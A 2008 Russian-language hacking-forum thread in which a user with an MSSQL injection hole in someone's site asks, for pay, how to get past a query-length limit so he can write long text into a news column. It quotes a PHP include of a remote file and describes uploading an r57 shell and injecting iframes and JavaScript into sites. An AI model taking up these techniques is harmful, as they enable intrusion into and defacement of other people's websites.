mssql иньекция !

Discussion in 'Уязвимости' started by exor, 17 Aug 2008.

  1. exor

    exor New Member

    Joined:
    16 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста как обойти ограничение по кол-ву вводимых символов при апдейте базы ? допустим я хочу проапдейтить колонку description и хочу вставить в нее 2000 символов (сама колонка разрешает такое кол-во) выдает ошибку , слишком длинный запрос !!! Спрашивал у людей они говорят что это можно как то обойти если посылать данные post запросом ! Как это сделать я вобще понятия не имею , пытался поискать в нете так ничего и не нашел !!! Пожалуйста помогите ...
     
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    колонка вывода новостей ? значит в ней хранится контент.. можеш приинклудить текст при некоторых условиях )
     
    #2 sabe, 17 Aug 2008
    Last edited: 17 Aug 2008
  3. exor

    exor New Member

    Joined:
    16 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Так так , а можно поподробней ? Желательно с небольшим примером !
     
  4. exor

    exor New Member

    Joined:
    16 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    в колонку должен сразу вставляться текст , как по твоему это будет работать <php include("http://marvelx.net/read.txt") ?> ?

    скрипт читает информацию с базы и вставляет ее в страницу , он не может исполнить скрипт который находится в базе !


    Готов заплатить за решение моего вопроса !
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    1) думаю там asp
    2) код из базы данных не когда не исполниться, он выведется в plain_text.
    3) просто глупо так как есть много других фишек.
     
  6. exor

    exor New Member

    Joined:
    16 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0

    Привет , но это же реально , я просто видел такие страницы ! В них вставляли кучу текста , мне это очень сильно нужно , если ты знаешь как это сделать пиши мне в пм ! О цене договоримся .
     
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    незнаю как вы.... а я заливал r57mysql ) и потом в полях новостей, заголовков... тупо писал что нужно.. много текста html javascript) фреймы вешал... и все испонялось.. так вот в твоем случаи нужно залить шелл..... и войти в базу данных..
     
    #7 sabe, 18 Aug 2008
    Last edited: 18 Aug 2008
  8. exor

    exor New Member

    Joined:
    16 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    О чем ты говоришь , какой шелл ! у меня дырка в mssql базе и все что я могу это апдейтить колонки , не путай эти вещи ! cash понял что меня интересует !
     
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    php asp исплоняеться на уровне веб сервера.
    Максимум что у тебя исплонится это php как plain_text.
    p.s. ты *****бол.

    2exor
    icq 10xx2
    x=4
     
    #9 guest3297, 19 Aug 2008
    Last edited: 19 Aug 2008
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    [ cash ]
    я про php не говорил, читай внимательно, ему вобще пхп не нужно.... а имено plain text. все что я написал выше я исполнял..

    пс: кто я 7

    exor
    понятно..... думал есть возможность залития шелла. нужно описывать проблему полностью.
     
    #10 sabe, 19 Aug 2008
    Last edited: 19 Aug 2008
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    дальнейшая дискусия бесмысленна.